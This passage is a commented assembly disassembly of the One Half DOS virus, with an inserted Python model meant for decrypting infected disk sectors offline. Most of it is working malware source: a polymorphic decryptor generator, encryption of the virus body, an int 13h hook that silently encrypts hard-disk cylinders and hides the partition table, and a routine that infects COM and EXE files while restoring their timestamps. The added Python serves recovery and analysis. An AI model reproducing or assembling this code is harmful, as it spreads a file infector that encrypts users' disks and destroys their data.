;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz putz be4 and after instruction unimportant_instructionz
; in : dx = how many u_instr
sub_0B72 proc near
mov ax, dx ; instr_count 2 ax
inc dx
call random_number ; gimme random_number
sub ax, dx ; sub cur_instr_count from
; instr_count
call sub_0B57 ; move unimportant_instr
xchg dx, ax
rep movsb ; move real_instruction
db 81h,0FBh ; cmp bx, offset jnz_offset - p
dw offset jnz_offset - p ; it'z last_one ? (jnz xor_...)
jnz short loc_0B92
mov ax, ds:[xor_offset - p] ; gimme xor_offset
sub ax, di ; sub cur_instr_buffer_index
add ax, offset instr_buffer - p; add instr_buffer_back
sub ax, [bx] ; sub jnz_offset
dec di ; go2 disp8
stosb ; and store it
loc_0B92:
call sub_0B57 ; and now put some u_instr
; after real_instruction
retn ; and end ...
sub_0B72 endp

m_?_i dw offset mov_?_instr - p ; 0b38h ; 0b96h ; 0614h


x_?_i dw offset xor_?_instr - p ; 0b3dh ; 0b98h ; 0616h
a_?_i dw offset add_?_instr - p ; 0b40h ; 0b9ah ; 0618h
m_i_? dw offset mov_index_? - p ; 0b34h ; 0b9ch ; 061ah
x_?_i_ dw offset xor_?_instr - p ; 0b3dh ; 0b9eh ; 061ch
i_?_i dw offset inc_?_instr - p ; 0b44h ; 0ba0h ; 061eh
c_i_? dw offset cmp_index_? - p ; 0b47h ; 0ba2h ; 0620h

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; This sets rite ModR/M instructions ....
; There are two phases here:
; 1. : m_?_i - a_?_i = sets instruction that worx with xor_reg
; 2. : m_i_? - c_i_? = sets instruction that worx with index_reg
; in : dl = random_number that depends on phase
; Just go through it and try to know what's happening here :)
sub_0BA4 proc near
loc_0BA4:
lodsw
xchg di, ax
mov al, dl
cmp si, offset i_?_i - p
jne short loc_0BB6
and al, 5
cmp al, 1
jne short loc_0BC6
mov al, 7
loc_0BB6:
cmp si, offset a_?_i - p
jne short loc_0BC6
mov cl, 3
shl al, cl
or [di], al
or al, 0C7h
jmp short loc_0BCA
loc_0BC6:
or [di], al
or al, 0F8h
loc_0BCA:
and [di], al
cmp si, offset m_i_? - p
je short loc_ret_0BDA
cmp si, offset sub_0BA4 - p
je short loc_ret_0BDA
jmp short loc_0BA4

loc_ret_0BDA:
retn
sub_0BA4 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz preparez decode_routine ...
sub_0BDB proc near
mov dx, 2
call random_number ; gimme random_number
mov byte ptr ds:[push_what - p], 0Eh; store push_cs
or dx, dx ; random_number zero ?
jz short loc_0BEF
mov byte ptr ds:[push_what - p], 16h; nope so store
; push_ss
loc_0BEF:
mov si, offset m_?_i - p ; start with first_phaze
loc_0BF2:
mov dx, 8
call random_number ; gimme random_number
cmp dl, 4 ; we don't need sp_reg
je loc_0BF2
mov bl, dl ; reg 2 bl
call sub_0BA4 ; set instructionz etc.
mov si, offset m_i_? - p ; start with second_phaze
loc_0C05:
mov dx, 3
call random_number ; gimme random_number
add dl, 6
cmp dl, 8
jne short loc_0C15
mov dl, 3 ; yope set bx_reg
loc_0C15:
cmp dl, bl ; xor_reg = index_reg ?
je loc_0C05
call sub_0BA4 ; nope so set instr. etc.
xor cx, cx
mov di, offset decode_routine_table - p
loc_0C21:
cmp cx, 9 ; jnz_instruction ?
jne short loc_0C40
loc_0C26: ; yope
; it'z jnz disp8
; so it must be in the range
; 0 - 80h bytez
mov dx, 0C8h
call random_number ; gimme random_number
sub dx, 64h ; sub 0c8h / 2
add dx, ds:[xor_offset - p] ; add xor_offset
cmp dx, 0 ; less than 0 ?
jl loc_0C26
cmp dx, ds:[max_number - p] ; more or same than max_number?
jge loc_0C26
jmp short loc_0C46
loc_0C40:
db 0bah ; mov dx, ?
max_number dw 466h ; random_max iz max_number
call random_number ; gimme random_number
loc_0C46:
jcxz short loc_0C5F ; first timez here ?
mov si, offset decode_routine_table - p
push cx ; nope
locloop_0C4C: ; so go2 cur_instr and check
; 4 distancez
lodsw
sub ax, dx ; check 4 distance
cmp ax, 0Ah ; more or same than 0ah bytez ?
jge loc_0C5C
cmp ax, 0FFF6h ; less or same than 0ah bytez ?
jle loc_0C5C
pop cx ; nope ! get another random_#
jmp loc_0C21
loc_0C5C: ; yope
loop locloop_0C4C ; so go2 next insrt
pop cx ; last_one
loc_0C5F:
xchg dx, ax ; random_number 2 ax
stosw ; store it 2 decode_...
inc cx ; inc counter
cmp cx, 0Ah ; less than 0ah (10 piecez) ?
jb loc_0C21
; nope = decode_routine_table
; initialized ...
mov bx, offset decode_routine_table - p
mov si, offset instr_start - p
loc_0C6D:
mov di, offset instr_buffer - p
lodsb ; read instr_length
mov cl, al ; instr_length 2 cx
mov dx, 8 ; u_instr 2 dx
sub dx, cx ; sub it
mov ax, [bx+2] ; gimme next_d_entry_offset
; if jnz_instr next iz
; viruz_beginning ...
sub ax, [bx] ; sub from it cur_d_entry
cmp ax, 0Ah ; distance 0ah ?
jne short loc_0C8B
inc dx ; inc u_instr (we don't need
inc dx ; jmp_instr ...)
call sub_0B72
inc bx ; go2 next decode_routine_
inc bx ; _offset
jmp short loc_0CB5 ; and go on
loc_0C8B: ; nope
call random_number ; gimme random_number
call sub_0B72 ; copy instruction 2 buffer ...
mov dx, di ; gimme instr_buffer_offset
sub dx, offset three_bytez - p; sub ofs instr_buffer - 3
add dx, [bx] ; add cur_d_entry
mov al, 0E9h ; far_jmp 2 al
stosb ; store it
inc bx ; go2 next_entry
inc bx
mov ax, [bx] ; gimme it
sub ax, dx ; sub it
cmp ax, 7Eh ; distance more than 7eh ?
jg short loc_0CB4
cmp ax, 0FF7Fh ; distance less than 0ff7fh ?
jl short loc_0CB4
inc ax ; nope inc distance (jmp_short
; only 2 bytez ...)
mov byte ptr [di-1], 0EBh ; store rather jmp_short
stosb ; store disp8
jmp short loc_0CB5 ; and go on
loc_0CB4: ; yope
stosw ; store disp16
loc_0CB5:
push bx
push cx
db 0b9h ; mov cx, 0
mov_cx_?_ dw 0 ; gimme file_pointer
db 0bah ; mov dx, 13h
mov_dx_?_ dw 13h
add dx, [bx-2] ; add decode_table_entry
adc cx, 0 ; (the current)
push cx
push dx
call sub_0E63 ; go2 f_ptr
mov cx, 0Ah ; read 0ah bytez
db 0bah ; mov dx, ?
buffer_offset dw 0a4h ; 2 [buffer_offset]
add ds:[buffer_offset - p], cx; go2 next_buffer_offset_entry
call f_read_
pop dx
pop cx
jc short loc_0CE6 ; error ?
call sub_0E63 ; go back 2 f_ptr
xchg cx, di ; cur_instr_buffer_offset 2 cx
mov dx, offset instr_buffer - p; sub offset instr_buffer
sub cx, dx ; sub it 2 get instr_size
call f_write_ ; and write it ...
loc_0CE6:
pop cx
pop bx
jc short loc_ret_0CF3 ; error ?
db 81h,0FBh ; cmp bx, offset beginning_ofs - p
dw offset beginning_ofs - p
jnc short loc_ret_0CF3 ; last decode_routine_entry ?
jmp loc_0C6D ; nope so go on ...

loc_ret_0CF3: ; yope
retn ; so end ...
sub_0BDB endp

; Purpose of moving 2 the buffer:
; while writing viruz_body 2 file the virus cryptz viruz_body, so
; int_13h, the crypt_routine and the routine that writes 2 file
; have 2 sit far away, outside the range the crypt_routine touches
presun_rutiny:
mov cx, offset buffer - p ; gimme size 2 write
xor dx, dx ; start with offset null
call sub_0D12 ; crypt_ it
mov ah, 40h ; write crypted_ viruz_body
mov bx, ds:[handle - p] ; 2 file; gimme handle
pushf ; and
db 9Ah ; call far ptr old_int_21h
old_int_21h dw 0, 0
jc short loc_0D0C ; error ?
cmp ax, cx ; written_&_wanted the same ?
loc_0D0C:
pushf ; push flagz
call sub_0D12 ; decrypt_ viruz_body
popf ; restore flagz
retn ; and end ...

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz cryptz_ viruz_body
sub_0D12 proc near
push cx
mov si, dx ; gimme viruz_start_offset
db 0b8h ; mov ax, 0
crypt_viruz dw 0 ; gimme init_crypt_value
mov cx, offset buffer - p ; gimme viruz_size

locloop_0D1B:
xor [si], ax ; crypt_it
db 05h ; add ax, ?
next_crypt_value dw 0 ; go2 next_crypt_value
inc si ; go2 next viruz_byte
loop locloop_0D1B ; and go on

pop cx
retn ; and end ...
sub_0D12 endp

new_int_24h:
mov al, 3
iret

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz old_int_13h
sub_0D28 proc near
pushf
call dword ptr cs:[old_int_13h - p__]
retn
sub_0D28 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz getz cylinder_number in si
sub_0D2F proc near
push cx
push dx
shr cl, 1
shr cl, 1
and dh, 0C0h
or dh, cl
mov cl, 4
shr dh, cl
mov dl, ch
xchg si, dx
pop dx
pop cx
retn
sub_0D2F endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz cryptz_ a buffer
crypt_ proc near
push ax
push bx ; push regz
push cx
db 0b0h ; mov al, ?
secz_count db 0 ; gimme secz_count
db 0bbh ; mov bx, ?
buf_ptr dw 0 ; gimme buf_ptr
loc_0D4D:
mov cx, 100h ; do it 256*
; (in wordz)
locloop_0D50:
db 26h, 81h, 37h ; xor word ptr es:[bx], ?
crypt_value dw 2b50h ; xor word ...
inc bx ; go2 next_word in buffer
inc bx
loop locloop_0D50 ; and go on

dec al ; dec secz_count
jnz loc_0D4D ; last one ?
pop cx ; yope
pop bx ; restore regz
pop ax
retn ; and end ...
crypt_ endp

new_int_13h:
cmp ah, 2 ; read sector(z) ?
je short loc_0D6E
cmp ah, 3 ; write sector(z) ?
je short loc_0D6E
jmp loc_0E50 ; nope so end
loc_0D6E:
cmp dx, 80h ; 0.head, first_harddisk ?
jne short loc_0DE0
test cx, 0FFC0h ; cylinder is null ?
jnz short loc_0DE0
push bx ; ok it could be work with
push dx ; partition_table or with
push si ; viruz_body
push di
push cx
push cx
mov si, ax ; gimme ax_reg
and si, 0FFh ; gimme secz_2_work
mov di, si
mov al, 1
push ax
jz short loc_0DBB ; secz_2_work is null ?
jcxz short loc_0DDB ; sec_number is null ?
cmp cl, 1 ; work with partition_table ?
je short loc_0DCD
loc_0D94: ; nope so it could be viruz
db 80h, 0f9h ; body
max_sektor db 11h ; cmp cl, ?
ja short loc_0DDB ; are we in the range
db 80h, 0f9h ; cmp cl, ?
partition_sec_n db 0ah ; where'z viruz_body ?
jb short loc_0DD2
cmp ah, 3 ; yope = writing ?
je short loc_0DDB ; (end_with error)
push bx
mov cx, 200h ; do it 512*

locloop_0DA7:
mov byte ptr es:[bx], 0 ; store null
inc bx ; inc buffer_ptr
loop locloop_0DA7 ; and go on ...

pop bx
loc_0DAF:
add bx, 200h ; go2 next_sec_in_buffer
pop ax
pop cx
inc cx ; inc sec_number
push cx
push ax
dec si ; dec secz_2_work
jnz loc_0D94 ; null ?
loc_0DBB:
clc
loc_0DBC: ; yope
pop ax ; restore ax_reg
pushf
xchg di, ax ; secz_2_work 2 ax
sub ax, si ; sub secz_that_weren't_read
popf
mov ah, ch ; error number 2 ah
pop cx
pop cx
pop di ; restore regz
pop si
pop dx
pop bx
retf 2 ; and end ...
loc_0DCD:
mov cl, byte ptr cs:[partition_sec_n - p__] ; yope
; so gimme partition_table_sec
loc_0DD2:
call sub_0D28 ; write or read it
mov ch, ah ; gimme possible_error_number
jc loc_0DBC ; error ?
jmp short loc_0DAF ; nope = go on
loc_0DDB: ; yope
stc ; so set up error_flag
mov ch, 0BBh ; and error_number 2 ch
jmp short loc_0DBC ; (undefined_error)
loc_0DE0: ; nope
cmp dl, 80h ; it'z first_harddisk ?
jne short loc_0E50
push ax
push cx
push dx
push si ; push regz
push ds
push cs
pop ds
mov byte ptr ds:[secz_count - p__], 0 ; store null
mov word ptr ds:[buf_ptr - p__], bx ; store bx
call sub_0D2F ; gimme cylinder_number
and cl, 3Fh ; mask off the sector bitz
and dh, 3Fh ; mask off the head
loc_0DFE:
or al, al ; secz_2_work is null ?
jz short loc_0E31
db 81h, 0feh ; cmp si, ?
max_cyl_number dw 265h ; are we in the range
jae short loc_0E31 ; where'z harddisk
db 81h, 0feh ; cmp si, ?
cur_cyl_number dw 1234h ; crypted_ ?
jb short loc_0E14
inc byte ptr ds:[secz_count - p__] ; yope inc secz_count
jmp short loc_0E1A
loc_0E14:
add word ptr ds:[buf_ptr - p__], 200h; go2 next_sec_in_buf
loc_0E1A:
dec al ; dec secz_2_work
inc cl
db 80h, 0f9h ; cmp cl, ?
max_sektor_2 db 11h ; sector in range ?
jbe loc_0DFE
mov cl, 1 ; nope so sector 2 1
inc dh ; and inc head
db 80h, 0feh ; cmp dh, ?
max_heads db 07h ; head in range ?
jbe loc_0DFE
xor dh, dh ; nope so head 2 null
inc si ; and inc cylinder
jmp short loc_0DFE ; and go on
loc_0E31: ; yope
cmp byte ptr ds:[secz_count - p__], 0; must we (un)crypt_
pop ds ; something ?
pop si ; restore regz
pop dx
pop cx
pop ax
jz short loc_0E50
cmp ah, 2 ; yope; read ?
je short loc_0E45
call crypt_ ; nope write; crypt_ it
loc_0E45:
call sub_0D28 ; do it
pushf
call crypt_ ; and uncrypt_ it
popf
retf 2
loc_0E50: ; end ...
db 0EAh ; jmp far ptr old_int_13h
old_int_13h label near
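The new_int_13h handler above is the disk-encryption stealth: a read or write to the first hard disk (dl = 80h) is walked sector by sector through the CHS geometry (sector, then head, then cylinder), every sector that lies at or above cur_cyl_number and below max_cyl_number is counted as encrypted, and crypt_ then XORs exactly those sectors word by word with crypt_value. The Python below is an added example, not part of Ratter's disassembly or of the virus: it models that walk so that a raw sector image pulled from an infected disk while the virus is not resident can be decrypted offline. The key 2b50h, the 17-sector/8-head geometry and the 265h cylinder limit are the values present in this particular sample (the virus keeps them in its own body and lowers cur_cyl_number as it encrypts more of the disk); on another infected disk they have to be read from that disk's copy of the virus, which is why they are parameters here.

```python
# Offline model of One Half's int 13h encryption layer (added example, not the
# virus's own code).  The constants are the values visible in this sample.
SECTOR_SIZE  = 512
CRYPT_VALUE  = 0x2B50   # crypt_value: XOR key applied to every 16-bit word
MAX_SECTOR   = 0x11     # max_sektor_2: sectors on a track are numbered 1..17
MAX_HEADS    = 0x07     # max_heads: heads are numbered 0..7
MAX_CYLINDER = 0x265    # max_cyl_number: first cylinder beyond the disk


def xor_sector(sector: bytes, key: int = CRYPT_VALUE) -> bytes:
    """XOR one 512-byte sector word by word (little-endian), as crypt_ does.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected one 512-byte sector")
    out = bytearray(sector)
    lo, hi = key & 0xFF, key >> 8
    for i in range(0, SECTOR_SIZE, 2):
        out[i] ^= lo
        out[i + 1] ^= hi
    return bytes(out)


def walk_chs(cyl: int, head: int, sector: int, count: int):
    """Yield (cyl, head, sector) for each sector of a multi-sector request,
    stepping sector -> head -> cylinder exactly like loc_0DFE .. loc_0E31."""
    for _ in range(count):
        yield cyl, head, sector
        sector += 1
        if sector > MAX_SECTOR:
            sector = 1
            head += 1
            if head > MAX_HEADS:
                head = 0
                cyl += 1


def is_encrypted(cyl: int, cur_cyl: int, max_cyl: int = MAX_CYLINDER) -> bool:
    """Cylinders from cur_cyl_number up to (not including) max_cyl_number."""
    return cur_cyl <= cyl < max_cyl


def decrypt_request(buffer: bytes, cyl: int, head: int, sector: int,
                    cur_cyl: int, key: int = CRYPT_VALUE,
                    max_cyl: int = MAX_CYLINDER) -> bytes:
    """Undo, on a raw multi-sector read, the XOR the resident virus would have
    applied on the fly.  The handler skips buf_ptr past every unencrypted
    sector and XORs the remaining secz_count sectors; because the walk only
    ever increases the cylinder, those form a contiguous tail of the buffer.
    Sectors at or beyond max_cyl_number are left alone: the handler stops there."""
    count = len(buffer) // SECTOR_SIZE
    out = bytearray(buffer)
    for n, (c, _h, _s) in enumerate(walk_chs(cyl, head, sector, count)):
        if c >= max_cyl:
            break
        if is_encrypted(c, cur_cyl, max_cyl):
            start = n * SECTOR_SIZE
            out[start:start + SECTOR_SIZE] = xor_sector(
                buffer[start:start + SECTOR_SIZE], key)
    return bytes(out)
```

Note what the model does not do: the real handler only intercepts functions 02h and 03h on drive 80h with a non-zero cylinder (cylinder 0 takes the partition-table stealth path at loc_0D6E), and on a write it encrypts the caller's buffer before the BIOS call and decrypts it again afterwards so the caller never sees ciphertext.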

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz writez 2 file ...
f_write_ proc near
mov ah, 40h
jmp $ + 4
f_write_ endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz readz from file ...
f_read_ proc near
mov ah, 3Fh ; '?'
call sub_0E6F
jc short loc_ret_0E5E
cmp ax, cx

loc_ret_0E5E:
retn
f_read_ endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz the f_ptr (seek) function, int 21h / ah = 42h: sof, eof or relative
sub_0E5F proc near
xor cx, cx
mov dx, cx
sub_0E63:
mov ax, 4200h
jmp short loc_0E6F
sub_0E68:
xor cx, cx
mov dx, cx
sub_0E6C:
mov ax, 4202h
sub_0E6F:
loc_0E6F:
mov bx, word ptr cs:[handle - p]

; Diz callz old_int_21h
int_21h:
pushf
cli
call dword ptr cs:[old_int_21h - p__]
retn
sub_0E5F endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz infectz the file ...
sub_0E7C proc near
mov bp, sp
mov ax, 5700h ; gimme file_time_&_date
call sub_0E6F
mov bx, offset file_time_date - p
mov [bx], cx ; store time_stamp
mov [bx+2], dx ; store date_stamp
call sub_1157 ; file already infected ?
jc short loc_0F0A
mov dx, 1Eh
call random_number ; gimme random_number
or dx, dx ; null ?
jz short loc_0E9D
mov [bx], ax ; nope so store new_time_stamp
loc_0E9D:
mov word ptr ds:[buffer_offset - p], offset overwritten_bytez - p
mov dx, 0FFFFh
push dx
call random_number ; gimme random_number
mov ds:[crypt_viruz_value - p], dx ; store it
mov ds:[crypt_viruz - p__], dx ; store it
pop dx
call random_number ; gimme next_random_number
mov ds:[next_crypt_value_ - p], dx ; store it
mov ds:[next_crypt_value - p__], dx ; store it
call sub_0E5F ; go2 sof
mov cx, 1Ah ; read 1ah_bytez
mov dx, offset file_buffer - p; 2 file_buffer
push dx ; (exe_hdr or 3bytez from com)
call f_read_ ; read it
jc short loc_0F24 ; error ?
xchg si, dx ; move these
mov di, offset exe_header - p
rep movsb ; bytez
call sub_0E68 ; go2 eof
mov si, ax ; size in ax : dx
mov di, dx ; 2 si : di
pop bx
cmp word ptr [bx], 4D5Ah ; 'MZ' ?
je short loc_0EFA ; it'z exe_file ?
cmp word ptr [bx], 5A4Dh ; 'ZM' ?
je short loc_0EFA ; it'z exe_file ?
mov byte ptr ds:[exe_flag - p], 0; nope = clear exe_flag
cmp ax, 0EFA6h ; file not 2 big ?
cmc
jc short loc_0F24
mov ax, 3 ; nope
cwd ; null dx_reg
push bx
jmp short loc_0F16
loc_0EFA:
mov byte ptr ds:[exe_flag - p], 1 ; set up exe_flag
mov ax, [bx+4] ; gime page_cnt
mul word ptr ds:[page_size_ - p] ; mul it with page_size
sub ax, si
sbb dx, di
loc_0F0A:
jc short loc_0F24
mov ax, [bx+8] ; gimme hdr_size
mul word ptr ds:[hdr_size_ - p] ; mul it with hdr_size
push bx
push ax
push dx
loc_0F16:
sub si, ax ; sub hdr_size
sbb di, dx ; or 3 bytez 4 far_jmp
or di, di ; file bigger than 0ffffh bytez ?
jnz short loc_0F2C
mov dx, si ; nope
sub dx, 3E8h ; so check whether the file
loc_0F24: ; iz not 2 small
jc short loc_0F98
cmp dx, 7D0h ; size less than 7d0h ?
jbe short loc_0F2F
loc_0F2C:
mov dx, 7D0h ; set max_number 2 7d0h
loc_0F2F:
call random_number ; gimme random_number
add dx, 3E8h ; add 7d0h / 2
mov ds:[viruz_start - p], dx ; store viruz_start
add dx, offset buffer - p + 280h ; add dx viruz_size
; + space 4 stack
cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ?
je short loc_0F49
mov ds:[file_buffer - p + 10h], dx ; yope store new exe_sp
loc_0F49:
add dx, 0FD80h ; sub 280h
mov ds:[viruz_end - p], dx ; store viruz_end
add dx, 0 - (offset buffer - offset loc_08d1)
mov ds:[beginning_ofs - p], dx; store beginning_ofs
add dx, 0 - (offset loc_08d1 - offset loc_0582) - 9
mov ds:[max_number - p], dx ; store max_number
add dx, 8 ; add 8 (viz up - 9 ...)
not dx ; make signed_number
mov cx, 0FFFFh ; the f_ptr functionz
; are signed
; so it will sub from the eof
; cx : dx ...
call sub_0E6C
mov ds:[mov_cx_?_ - p], dx ; store new_file_poz
mov ds:[mov_dx_?_ - p], ax ; as a base ...
cmp byte ptr ds:[exe_flag - p], 0 ; com_file ?
jne short loc_0F81
xchg dx, ax ; gimme base
add dx, 100h ; add 100h
jmp short loc_0F8B ; and go on
loc_0F81:
pop di
pop si
sub ax, si ; count base_addr
sbb dx, di
div word ptr ds:[hdr_size_ - p]
loc_0F8B:
add ds:[viruz_start - p], dx; add base
add ds:[viruz_end - p], dx ; add base
push ax
push dx
call sub_0BDB ; ok now prepare decode_rout...
loc_0F98:
jc short loc_0FFE ; error ?
pop dx ; and now add base
pop ax ; 2 decode_routine_table_
mov cx, 0Ah ; _entryz ...
mov si, offset decode_routine_table - p

locloop_0FA2:
add [si], dx ; add base
inc si ; go2 next_entry
inc si
loop locloop_0FA2 ; and go on ...

pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; com_file ?
jne short loc_0FD0
mov byte ptr [bx], 0E9h ; store far_jump
mov ax, ds:[decode_routine_table - p]; gimme jump_offset
sub ax, 103h ; sub 103h (100h PSP and 03h
; far_jmp)
mov [bx+1], ax ; store it
mov word ptr ds:[relo_cnt - p], 0; store relo_cnt
mov word ptr ds:[relo_cs - p], 0FFF0h; store relo_cs
mov word ptr ds:[exe_ip - p], 100h; store exe_ip
jmp short loc_0FF7 ; and go on
loc_0FD0: ; nope exe_file
mov [bx+16h], ax ; store relo_cs
mov [bx+0Eh], ax ; store relo_ss
mov ax, ds:[decode_routine_table - p]; gimme starting_ofs
mov [bx+14h], ax ; store exe_ip
add [bx+10h], dx ; add it 2 exe_sp
mov word ptr [bx+6], 0 ; null relo_cnt
mov ax, 28h ; my_min_mem 2 ax
cmp [bx+0Ah], ax ; compare it with min_mem
jae short loc_0FEF ; more ?
mov [bx+0Ah], ax ; yope so store my_min_mem
loc_0FEF:
cmp [bx+0Ch], ax ; compare it with max_mem
jae short loc_0FF7 ; more ?
mov [bx+0Ch], ax ; yope so store my_max_mem
loc_0FF7:
push bx
call sub_0E68 ; go2 eof
db 0e8h ; call presun_rutiny (
; viruz_body_crypt_&_write)
dw offset presun_rutiny - presun_rutiny + buffer - next___
next___ label near ; crypt_ it and write it
loc_0FFE:
jc short loc_1031
call sub_0E68 ; go2 eof
div word ptr ds:[page_size_ - p] ; div new_file_size
inc ax ; 2 count pagez
pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ?
je short loc_1016
mov [bx+4], ax ; store new page_cnt
mov [bx+2], dx ; store new part_pag
loc_1016:
push bx
call sub_0E5F ; go2 sof
mov cx, 1Ah
pop dx
call f_write_ ; write new_exe_header 2 file
jc short loc_1031 ; error ?
mov ax, 5701h ; set back file_time_date
mov cx, ds:[file_time_date - p] ; gimme time_stamp
mov dx, ds:[file_time_date - p + 2] ; gimme date_stamp
call sub_0E6F ; set it
loc_1031:
mov sp, bp
retn ; and end ...
sub_0E7C endp

